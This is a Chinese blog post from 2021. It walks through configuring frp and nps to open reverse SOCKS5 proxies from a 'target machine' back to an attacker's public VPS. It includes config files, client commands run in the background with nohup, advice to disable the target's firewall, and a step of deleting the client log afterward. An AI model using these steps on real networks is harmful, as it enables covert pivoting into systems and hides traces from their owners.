frp&nps实现socks5代理

frp反向socks代理

攻击机(服务端)

①开启监听,frps.ini配置文件

# frp.ini
[common]
bind_port = 7000
token = 写不写都行,要一一对应

②开启监听

frps.exe -c frps.ini

③proxifier/proxychains

ip 端口 账号/密码对应目标机frpc.ini中设置的内容

目标机(防火墙要关掉,客户端)

①frpc.ini配置文件

[common]
server_addr = 公网vps ip
server_port = 公网vps监听的端口
token = 对应
use_encryption = true
use_compression = true

[目标系统名]
type = tcp
remote_port = 公网vps中proxifier/proxychains设置的端口(外面的端口)
plugin = socks5

②反向连接

./frpc -c frpc.ini

nohup ./frpc -c conf.txt & / frpc.exe -c conf.txt

nps实现

nps服务端安装

工具下载地址:https://github.com/ehang-io/nps/releases

挑选服务端下载文件,我这边用的是win vps,所以选择windows_amd64_server.tar.gz

上传到自己的vps,管理员cmd运行nps.exe install

安装好后

nps.exe start
nps.exe stop
nps.exe restart
nps.exe update

默认使用的是8080端口,注意不要冲突。

服务启动后就可以在本机访问vps的ip:port去web管理界面了。

特别注意,安装好后的nps,配置文件在C:\Program Files\nps\conf\nps.conf

(我一直以为还在nps安装时的conf文件,修改配置不生效,浪费了好多时间)

主要修改如下配置,至少把管理员账号密码改了。

#web
web_host=a.o.com
web_username=admin # 修改
web_password=123 # 修改
web_port = 8080 # 修改
web_ip=0.0.0.0
web_base_url=
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key

web管理端配置

ip:port进入web页面

image-20210727175108826

新建一个客户端

image-20210727175447658

新建一个socks5代理,客户端ID对应

image-20210727175606757

点开+号,复制一下客户端命令

至此web管理端配置完毕

npc客户端运行代理

执行以下命令进行无配置文件连接,并且后台运行,查看客户端日志然后删除

Windows:
    npc.exe -server=XXX.XXX.XXX.XXX:8024 -vkey=password -type=tcp
Linux:
    nohup ./npc -server=XXX.XXX.XXX.XXX:8024 -vkey=password -type=tcp >> nps.log &

image-20210818002229254

proxifier连接

配置代理规则

image-20210727180046569

检查测试

image-20210818002246723

成了

posted @ 2021-07-27 18:19  LEOGG  阅读(1434)  评论(0编辑  收藏  举报